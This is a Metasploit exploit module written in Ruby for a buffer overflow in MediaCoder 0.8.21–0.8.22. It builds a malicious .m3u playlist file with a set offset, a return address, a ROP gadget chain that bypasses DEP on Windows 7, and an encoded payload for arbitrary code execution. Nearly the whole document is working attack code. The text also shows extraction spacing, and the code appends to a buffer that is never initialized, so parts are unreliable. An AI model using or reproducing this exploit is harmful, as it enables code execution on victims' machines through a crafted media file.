|
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit:: FILEFORMAT
def initialize(info = {})
super (update_info(info,
'Name' => 'MediaCoder .M3U Buffer Overflow' ,
'Description' => %q{
This module exploits a buffer overflow in MediaCoder 0 . 8 . 22 . The vulnerability
occurs when adding an .m3u, allowing arbitrary code execution under the context
of the user. DEP bypass via ROP is supported on Windows 7 , since the MediaCoder
runs with DEP . This module has been tested successfully on MediaCoder 0 . 8 . 21 . 5539
to 0 . 8 . 22 . 5530 over Windows XP SP3 and Windows 7 SP0 .
},
'License' => MSF_LICENSE ,
'Author' =>
[
'metacom' ,
'modpr0be <modpr0be[at]spentera.com>' ,
'otoy <otoy[at]spentera.com>'
],
'References' =>
[
[ 'OSVDB' , '94522' ],
[ 'EDB' , '26403' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh'
},
'Platform' => 'win' ,
'Payload' =>
{
'Space' => 1200 ,
'BadChars' => "\x00\x5c\x40\x0d\x0a" ,
'DisableNops' => true ,
'StackAdjustment' => - 3500
},
'Targets' =>
[
[ 'MediaCoder 0.8.21 - 0.8.22 / Windows XP SP3 / Windows 7 SP0' ,
{
'Ret' => 0x6afd4435,
'Offset' => 849 ,
'Max' => 5000
}
],
],
'Privileged' => false ,
'DisclosureDate' => 'Jun 24 2013' ,
'DefaultTarget' => 0 ))
register_options(
[
OptString. new ( 'FILENAME' , [ false , 'The file name.' , 'msf.m3u' ])
], self . class )
end
def junk(n= 1 )
return [rand_text_alpha( 4 ).unpack( "L" )[ 0 ]] * n
end
def nops(rop= false , n= 1 )
return rop ? [0x6ab16202] * n : [0x90909090] * n
end
def exploit
rop_gadgets =
[
nops( true , 35 ),
0x100482ff,
0xffffffc0,
junk,
0x66d9d9ba,
0x6ab2241d,
junk( 15 ),
0x1004cc03,
0x6ab561b0,
0x66d9feee,
0x6ab19780,
0x66d929f5,
0xfffffcc0,
junk,
0x6ab3c65a,
0x1004cc03,
0xffffffff,
0x660166e9,
0x66d8ae48,
0x1005f6e4,
0x6ab3d688,
0x6ab4ead0,
0x100444e3,
nops( true ),
0x100482ff,
nops,
0x6ab01c06,
0x6ab28dda,
].flatten.pack( "V*" )
sploit << rand_text(target[ 'Offset' ])
sploit << [target.ret].pack( 'V' )
sploit << rop_gadgets
sploit << make_nops( 16 )
sploit << payload.encoded
sploit << rand_text(target[ 'Max' ]-sploit.length)
file_create(sploit)
end
end
|